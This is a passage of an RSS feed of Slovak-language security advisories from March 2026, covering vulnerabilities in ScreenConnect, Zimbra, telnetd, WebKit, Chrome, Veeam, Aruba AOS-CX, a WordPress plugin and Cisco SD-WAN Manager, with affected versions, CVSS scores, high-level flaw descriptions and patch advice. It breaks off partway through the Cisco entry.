					<comments>/posts/3224#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 19 Mar 2026 12:34:57 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ConnectWise]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[ScreenConnect]]></category>
		<guid isPermaLink="false">/?p=3224</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/03/ScreenConnect.png" alt="" /></p>Spoločnosť ConnectWise opravila kritickú zraniteľnosť v&#160;produkte ScreenConnect, ktorá umožňuje útočníkom získať prístup ku kryptografickému materiálu inštancie, a&#160;spolu s&#160;ním k&#160;aktívnym reláciám....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/03/ScreenConnect.png" alt="" /></p>
<p><strong>Spoločnosť ConnectWise opravila kritickú zraniteľnosť v&nbsp;produkte ScreenConnect, ktorá umožňuje útočníkom získať prístup ku kryptografickému materiálu inštancie, a&nbsp;spolu s&nbsp;ním k&nbsp;aktívnym reláciám. Útočník môže tiež získať zvýšené oprávnenia. Spoločnosť pozorovala pokusy o&nbsp;zneužitie zraniteľnosti.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>ScreenConnect, verzie staršie ako 26.1</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-3564</strong> (CVSS skóre 9,0)</p>



<p>Aplikácia ScreenConnect obsahuje kritickú zraniteľnosť, ktorá umožňuje vzdialenému neautorizovanému útočníkovi získať prístup ku autentifikačnému kryptografickému materiálnu inštancie (kľúče ASP.NET) a s vyššími oprávneniami získať tak prístup k aktívnym reláciám.</p>



<p>Kryptografické kľúče ukladala aplikácia ku konfiguračným súborom servera. Po aktualizácii sú uložené v šifrovanom úložisku. Spoločnosť ConnectWise zaviedla tiež možnosť obmeniť kryptografický materiál na vyžiadanie administrátora inštancie.</p>



<p>Spoločnosť ConnectWise informovala o pokusoch o zneužitie zraniteľnosti.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia oprávnení</strong></li>



<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná <a href="https://www.screenconnect.com/download">aktualizácia ScreenConnect</a> aspoň na verziu 26.1.</p>



<p>Cloudové inštancie spoločnosť zabezpečila automaticky a netreba vykonať ďalšie kroky.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.connectwise.com/company/trust/advisories">https://www.connectwise.com/company/trust/advisories</a></li>



<li><a href="https://www.connectwise.com/company/trust/security-bulletins/2026-03-17-screenconnect-bulletin">https://www.connectwise.com/company/trust/security-bulletins/2026-03-17-screenconnect-bulletin</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-3564">https://nvd.nist.gov/vuln/detail/CVE-2026-3564</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3224/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zneužívaná zraniteľnosť Zimbra Collaboration Suite dovoľuje perzistentné XSS</title>
		<link>/posts/3222</link>
					<comments>/posts/3222#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 19 Mar 2026 12:30:20 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Zimbra]]></category>
		<category><![CDATA[Zimbra Collaboration Suite]]></category>
		<guid isPermaLink="false">/?p=3222</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/02/zimbra.png" alt="" /></p>CISA pridala do katalógu aktívne zneužívaných zraniteľností (KEV) vysoko závažnú zraniteľnosť Zimbra Collaboration Suite. CVE-2025-66376 umožňuje neautentifikovanému útočníkovi vykonávať útoky...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/02/zimbra.png" alt="" /></p>
<p><strong>CISA pridala do katalógu aktívne zneužívaných zraniteľností (KEV) vysoko závažnú zraniteľnosť Zimbra Collaboration Suite. CVE-2025-66376 umožňuje neautentifikovanému útočníkovi vykonávať útoky typu XSS cez e-maily vo formáte HTML.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Zimbra Collaboration Suite verzie staršej ako 10.0.18</li>



<li>Zimbra Collaboration Suite verzie staršej ako 10.1.13</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-66376</strong> (CVSS skóre 7,2)</p>



<p>Organizácia CISA pridala do svojho katalógu aktívne zneužívaných zraniteľností (KEV) vysoko závažnú chybu zabezpečenia v produkte v Zimbra Collaboration Suite. Zraniteľnosť sa nachádza v komponente Classic UI a umožňuje vykonávať útoky typu uloženého/perzistentného XSS. Vzdialený neautorizovaný útočník na to môže zneužiť direktívu CSS @import pri príprave škodlivých e-mailov vo formáte HTML.</p>



<p>Vývojári spoločnosti Synacor zraniteľnosť opravili v novembri 2025.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Zimbra Collaboration Suite aspoň na verziu 10.0.18 alebo 10.1.13.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66376">https://nvd.nist.gov/vuln/detail/CVE-2025-66376</a></li>



<li><a href="https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories">https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories</a></li>
</ul>



<figure class="wp-block-embed"><div class="wp-block-embed__wrapper">
https://www.cisa.gov/known-exploited-vulnerabilities-catalog
</div></figure>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3222/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť GNU InetUtils telnetd umožňuje vzdialené vykonanie kódu</title>
		<link>/posts/3220</link>
					<comments>/posts/3220#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 19 Mar 2026 12:28:19 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[InetUtils]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[telnetd]]></category>
		<guid isPermaLink="false">/?p=3220</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/01/gnu_inetutils-1024x712.png" alt="" /></p>Bezpečnostní výskumníci zverejnili informácie o kritickej zraniteľnosti v GNU InetUtils telnetd. CVE-2026-32746 sa nachádza v handleri LINEMODE SLC (Set Local...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/01/gnu_inetutils-1024x712.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zverejnili informácie o kritickej zraniteľnosti v GNU InetUtils telnetd. CVE-2026-32746 sa nachádza v handleri LINEMODE SLC (Set Local Characters) a umožňuje zápis do pamäte mimo povolených hodnôt.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>GNU InetUtils telnetd vo verzii 2.7 a staršie</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2026-32746 </strong>(CVSS skóre: 9,8)</p>



<p>Kritická zraniteľnosť s&nbsp;označením CVE-2026-32746 sa nachádza v&nbsp;handleri LINEMODE SLC (Set Local Characters). Súvisí s&nbsp;pretečením vyrovnávacej pamäte kvôli chýbajúcej kontrole jej obsadenia vo funkcii add_slc a umožňuje zápis do pamäte mimo povolených hodnôt. Vzdialený neautentifikovaný útočník ju môže zneužiť zaslaním špeciálne vytvorených správ počas &nbsp;fázy inicializovania pripájania (handshake) pred aktivovaním prihlasovacieho okna. Tým získa možnosť vzdialene vykonať kód s&nbsp;oprávneniami používateľa root a&nbsp;môže získať úplnú kontrolu nad systémom.</p>



<p><strong>Na uvedenú zraniteľnosť je dostupný proof-of-concept kód demonštrujúci mechanizmus jej zneužitia.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia oprávnení</strong></li>



<li><strong>Narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezpečnostné aktualizácie by mali byť dostupné najneskôr 1. apríla 2026. Do vydania aktualizácií odporúčame zraniteľnosť mitigovať limitovaním prístupu cez telnet len na zoznam dôveryhodných IP adries, prípadne úplné blokovanie komunikácie na port 23 alebo deaktiváciu telnetd, ak nie je využívaná.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://dreamgroup.com/vulnerability-advisory-pre-auth-remote-code-execution-via-buffer-overflow-in-telnetd-linemode-slc-handler/">https://dreamgroup.com/vulnerability-advisory-pre-auth-remote-code-execution-via-buffer-overflow-in-telnetd-linemode-slc-handler/#</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-32746">https://nvd.nist.gov/vuln/detail/CVE-2026-32746</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3220/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Apple opravila zraniteľnosť komponentu WebKit umožňujúcu obídenie politiky Same Origin</title>
		<link>/posts/3218</link>
					<comments>/posts/3218#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 19 Mar 2026 12:26:42 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[WebKit]]></category>
		<guid isPermaLink="false">/?p=3218</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>Spoločnosť Apple vydala bezpečnostné aktualizácie svojich operačných systémov iOS, iPadOS a macOS, ktoré opravujú zraniteľnosť komponentu WebKit. Zraniteľnosť spočíva v&#160;chybe...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>
<p><strong>Spoločnosť Apple vydala bezpečnostné aktualizácie svojich operačných systémov iOS, iPadOS a macOS, ktoré opravujú zraniteľnosť komponentu WebKit. Zraniteľnosť spočíva v&nbsp;chybe mechanizmu CORS, ktorá vyplýva z nedostatočného overovania vstupov v rámci Navigation API.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Zariadenia s&nbsp;operačným systémom verzie iOS 26.3.1</li>



<li>Zariadenia s&nbsp;operačným systémom verzie iPadOS 26.3.1</li>



<li>Zariadenia s&nbsp;operačným systémom verzie macOS 26.3.1</li>



<li>Zariadenia s&nbsp;operačným systémom verzie macOS 26.3.2</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2026-20643 </strong>(CVSS skóre: 5,4)</p>



<p>Zraniteľnosť s&nbsp;označením CVE-2026-20643 sa nachádza v komponente WebKit a spočíva v&nbsp;chybnom nastavení mechanizmu CORS, resp. nedostatočnom overovaní vstupov v rámci Navigation API. Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na obídenie politiky Same Origin.</p>



<p>Spoločnosť Apple zraniteľnosť opravila záplatou cez službu Background Security Improvements, pri ktorej inštalácii sa po vzore Microsoft HotPatch nevyžaduje reštart zariadenia. Ide o zdôraznenie potreby operatívneho aktualizovania za účelom rýchlej reakcie na hrozby a zraniteľnosti. Apple uviedla, že sa zároveň jedná o prvú aktualizáciu vydanú týmto spôsobom.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Kompromitácia zariadenia</strong></li>



<li><strong>Únik citlivých údajov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Apple odporúča využiť službu Background Security Improvements na bezodkladnú aktualizáciu operačných systémov iOS, iPadOS &nbsp;a macOS.&nbsp;Zapnúť ju možno v aplikácii Settings v&nbsp;časti Privacy and Security.</p>



<p>Pokiaľ danú službu nechcete využiť, zraniteľnosti opraví spoločnosť v&nbsp;nasledujúcej aktualizácii zasiahnutých operačných systémov.<strong></strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.apple.com/en-us/126604">https://support.apple.com/en-us/126604</a></li>



<li><a href="https://thehackernews.com/2026/03/apple-fixes-webkit-vulnerability.html">https://thehackernews.com/2026/03/apple-fixes-webkit-vulnerability.html</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-20643">https://nvd.nist.gov/vuln/detail/CVE-2026-20643</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3218/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zero-day zraniteľnosti Google Chrome</title>
		<link>/posts/3210</link>
					<comments>/posts/3210#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 16 Mar 2026 13:07:43 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3210</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>Spoločnosť Google vydala bezpečnostné aktualizácie svojho webového prehliadača Chrome, ktoré opravujú dve aktívne zneužívané vysoko závažné zraniteľnosti. Neautorizovanému útočníkovi po...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>
<p><strong>Spoločnosť Google vydala bezpečnostné aktualizácie svojho webového prehliadača Chrome, ktoré opravujú dve aktívne zneužívané vysoko závažné zraniteľnosti. Neautorizovanému útočníkovi po ich zneužití umožňujú zapisovať do pamäte a vzdialene vykonávať kód.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Google Chrome pre Windows verzie staršej ako 146.0.7680.75/76</li>



<li>Google Chrome pre Mac verzie staršej ako 146.0.7680.75/76</li>



<li>Google Chrome pre Linux verzie staršej ako 146.0.7680.75</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Vývojári spoločnosti Google opravili dve aktívne zneužívané zero-day zraniteľnosti v internetovom prehliadači Chrome.</p>



<p><strong>CVE-2026-3909</strong> (CVSS skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť sa nachádza v grafickej knižnici Skia. Vyplýva z možnosti zapisovania do pamäte mimo povolené hodnoty. Vzdialený neautorizovaný útočník ju môže zneužiť pomocou špeciálne vytvorenej webstránky.</p>



<p><strong>CVE-2026-3910</strong> (CVSS skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť sa nachádza v nástroji V8. Vyplýva z nešpecifikovanej nevhodnej implementácie. Vzdialený neautorizovaný útočník ju môže zneužiť pomocou špeciálne vytvorenej webstránky, čím získa možnosť vykonávať ľubovoľný kód v sandboxe prehliadača.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Chrome pre Windows a Mac aspoň na verziu 146.0.7680.75/76 a Linux aspoň na verziu 146.0.7680.75.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-3909">https://nvd.nist.gov/vuln/detail/CVE-2026-3909</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-3910">https://nvd.nist.gov/vuln/detail/CVE-2026-3910</a></li>



<li><a href="https://thehackernews.com/2026/03/google-fixes-two-chrome-zero-days.html">https://thehackernews.com/2026/03/google-fixes-two-chrome-zero-days.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3210/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Veeam opravuje viaceré kritické zraniteľnosti produktu Backup &#038; Replication</title>
		<link>/posts/3208</link>
					<comments>/posts/3208#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 16 Mar 2026 13:05:58 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Backup & Replication]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Veeam]]></category>
		<guid isPermaLink="false">/?p=3208</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>Spoločnosť Veeam vydala bezpečnostné aktualizácie zálohovacieho riešenia Backup &#38; Replication, ktoré opravujú 7 zraniteľností, z čoho 5 je označených ako...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>
<p><strong>Spoločnosť Veeam vydala bezpečnostné aktualizácie zálohovacieho riešenia Backup &amp; Replication, ktoré opravujú 7 zraniteľností, z čoho 5 je označených ako kritické. Vzdialenému autentifikovanému útočníkovi umožňujú vykonávanie kódu, obídenie bezpečnostných prvkov a manipuláciu so súbormi, eskaláciu privilégií a&nbsp;získanie prihlasovacích údajov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Veeam Backup &amp; Replication 12.3.2.4165 a&nbsp;staršie verzie 12.x.x.x</li>



<li>Veeam Backup &amp; Replication 13.0.1.1071 a&nbsp;staršie verzie 13.x.x.x</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-21666, CVE-2026-21667, CVE-2026-21669</strong> (CVSS skóre 9,9)</p>



<p>Kritické zraniteľnosti komponentu Backup Server umožňujú autentifikovanému doménovému používateľovi vzdialene vykonávať kód.</p>



<p><strong>CVE-2026-21668</strong> (CVSS skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť komponentu Backup Repository umožňuje autentifikovanému doménovému používateľovi obísť zabezpečenie a manipulovať s ľubovoľnými súbormi.</p>



<p><strong>CVE-2026-21670</strong> (CVSS skóre 7,7)</p>



<p>Vysoko závažná zraniteľnosť umožňujúca útočníkovi s nízkymi oprávneniami získať prihlasovacie údaje k SSH.</p>



<p><strong>CVE-2026-21671</strong> (CVSS skóre 9,1)</p>



<p>Kritická zraniteľnosť inštancií Backup &amp; Replication s vysokou dostupnosťou (HA) umožňuje autentifikovanému doménovému používateľovi s oprávneniami Backup Administrator vzdialene vykonávať kód.</p>



<p><strong>CVE-2026-21672</strong> (CVSS skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť Windowsových serverov Backup &amp; Replication umožňuje lokálnemu útočníkovi navýšenie oprávnení.</p>



<p><strong>CVE-2026-21708</strong> (CVSS skóre 9,9)</p>



<p>Kritická zraniteľnosť komponentu umožňuje útočníkovi s rolou Backup Viewer vzdialene vykonávať kód v kontexte používateľa <em>postgres</em>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Obchádzanie bezpečnostných prvkov</strong></li>



<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Veeam Backup &amp; Replication aspoň na verziu 12.3.2.4465 alebo 13.0.1.2067.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.veeam.com/kb4830">https://www.veeam.com/kb4830</a></li>



<li><a href="https://www.veeam.com/kb4831">https://www.veeam.com/kb4831</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3208/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v HPE Aruba Networking AOS-CX umožňuje reset administrátorského hesla</title>
		<link>/posts/3206</link>
					<comments>/posts/3206#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 13 Mar 2026 15:25:44 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=3206</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Hewlett-Packard-Logo-1999-1024x576.png" alt="" /></p>Spoločnosť HPE (Hewlett Packard Enterprise) vydala balík aktualizácií operačného systému prepínačov série Aruba CX, ktorý okrem iných opravuje jednu kritickú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Hewlett-Packard-Logo-1999-1024x576.png" alt="" /></p>
<p><strong>Spoločnosť HPE (Hewlett Packard Enterprise) vydala balík aktualizácií operačného systému prepínačov série Aruba CX, ktorý okrem iných opravuje jednu kritickú zraniteľnosť. CVE‑2026‑23813 umožňuje útočníkovi bez akýchkoľvek prihlasovacích údajov obísť autentifikáciu webového manažmentového rozhrania.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>AOS-CX vo verzii 10.17.0001 a starších</li>



<li>AOS-CX vo verzii 10.16.1020 a starších</li>



<li>AOS-CX vo verzii 10.13.1160 a starších</li>



<li>AOS-CX vo verzii 10.10.1170 a starších</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE‑2026‑23813 </strong>(CVSS 3.1 skóre 9,8)</p>



<p>Kritická bezpečnostná zraniteľnosť vo webovom manažmentovom rozhraní prepínačov Aruba CX, v&nbsp;systéme AOS-CX, umožňuje vzdialenému útočníkovi obísť autentifikačný mechanizmus zariadenia. V niektorých prípadoch môže viesť k resetu administrátorského hesla, čím môže útočník získať plný prístup a úplnú kontrolu nad systémom.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom sa odporúča čo najskôr vykonať aktualizáciu zasiahnutých systémov aspoň na verziu:</p>



<ul>
<li>AOS-CX vo verzii 10.17.1001</li>



<li>AOS-CX vo verzii 10.16.1030</li>



<li>AOS-CX vo verzii 10.13.1161</li>



<li>AOS-CX vo verzii 10.10.1180</li>
</ul>



<p>Ak aktualizáciu nie je možné realizovať, zraniteľnosť je možné zmierniť obmedzením prístupu k manažmentovému rozhraniu zariadení len z&nbsp;dôveryhodných zdrojov a deaktivováciou rozhraní HTTP(S) na SVI (Switched Virtual Interfaces) a na routovaných portoch, kde nie je potrebný manažmentový prístup. Zároveň je vhodné nastaviť kontrolu prístupov (Control Plane Access Control List) pre manažmentové rozhrania REST/HTTP. Odporúča sa tiež zaviesť logovanie a priebežné monitorovanie aktivity zariadení.</p>



<p><strong>Zdroj:</strong></p>



<ul>
<li><a href="https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05027en_us&amp;docLocale=en_US">https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05027en_us&amp;docLocale=en_US</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-23813">https://nvd.nist.gov/vuln/detail/CVE-2026-23813</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3206/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť modulu WordPress User Registration &#038; Membership</title>
		<link>/posts/3197</link>
					<comments>/posts/3197#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 06 Mar 2026 16:07:59 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[User Registration & Membership]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=3197</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/03/Wordpress-user-registration.png" alt="" /></p>Spoločnosť WPEverest vydala bezpečnostnú aktualizáciu svojho modulu User Registration &#38; Membership pre WordPress, ktorá opravuje aktívne zneužívanú kritickú zraniteľnosť CVE-2026-1492....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/03/Wordpress-user-registration.png" alt="" /></p>
<p><strong>Spoločnosť WPEverest vydala bezpečnostnú aktualizáciu svojho modulu User Registration &amp; Membership pre WordPress, ktorá opravuje aktívne zneužívanú kritickú zraniteľnosť CVE-2026-1492. Vzdialený neautentifikovaný útočník ju môže zneužiť na vytvorenie administrátorského účtu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>User Registration &amp; Membership pre WordPress, verzia 5.1.2 a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-1492</strong> (CVSS skóre 9,8)</p>



<p>Kritická chyba modulu User Registration &amp; Membership pre WordPress vyplýva z nevhodného manažmentu oprávnení. Používateľ môže pri registrácii zadať svoju rolu, ktorú systém akceptuje bez overenia na strane servera. Neautentifikovaný útočník si tak môže vytvoriť účet s administrátorskými oprávneniami, s ktorým môže napríklad vykonávať zmeny na webstránke, pristupovať k jej databázam, inštalovať moduly, zasahovať do PHP kódu, či meniť bezpečnostné nastavenia.</p>



<p><strong>Spoločnosť Defiant informovala o&nbsp;aktívnom zneužívaní zraniteľnosti.</strong><strong></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia oprávnení</strong></li>



<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia modulu User Registration &amp; Membership pre WordPress aspoň na verziu 5.1.3.</p>



<p>Taktiež odporúčame vykonať audit používateľských kont kvôli prítomnosti neautorizovaných účtov, prípadne logoch kvôli stopám poukazujúcim na pokus o zneužitie zraniteľnosti.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-512-unauthenticated-privilege-escalation-via-membership-registration">https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-512-unauthenticated-privilege-escalation-via-membership-registration</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-1492">https://nvd.nist.gov/vuln/detail/CVE-2026-1492</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/wordpress-membership-plugin-bug-exploited-to-create-admin-accounts/">https://www.bleepingcomputer.com/news/security/wordpress-membership-plugin-bug-exploited-to-create-admin-accounts/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3197/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Závažné zraniteľnosti Cisco Catalyst SD‑WAN Manager</title>
		<link>/posts/3194</link>
					<comments>/posts/3194#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 06 Mar 2026 16:04:26 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Catalyst SD-WAN Manager]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=3194</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco opravila 5 závažných zraniteľností v Catalyst SD‑WAN Manager. Tieto útočníkom umožňujú manipulovať so súbormi, získavať informácie, obchádzať prihlásenie,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco opravila 5 závažných zraniteľností v Catalyst SD</strong><strong>‑</strong><strong>WAN Manager. Tieto útočníkom umožňujú manipulovať so súbormi, získavať informácie, obchádzať prihlásenie, či eskalovať svoje oprávnenia. Cisco potvrdila, že útočníci aktívne zneužívajú dve z opravených zraniteľností.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco Catalyst SD-WAN Manager staršie ako 20.9</li>



<li>Cisco Catalyst SD-WAN Manager 20.9, verzie staršie ako 20.9.8.2</li>



<li>Cisco Catalyst SD-WAN Manager 20.11 a&nbsp;20.12, verzie staršie ako 20.12.5.3 a&nbsp;20.12.6.1</li>



<li>Cisco Catalyst SD-WAN Manager 20.13, 20.14, 20.15, verzie staršie ako 20.15.4.2</li>



<li>Cisco Catalyst SD-WAN Manager 20.16, 20.18, verzie staršie ako 20.18.2.1</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-20122</strong> (CVSS skóre 7,1)</p>



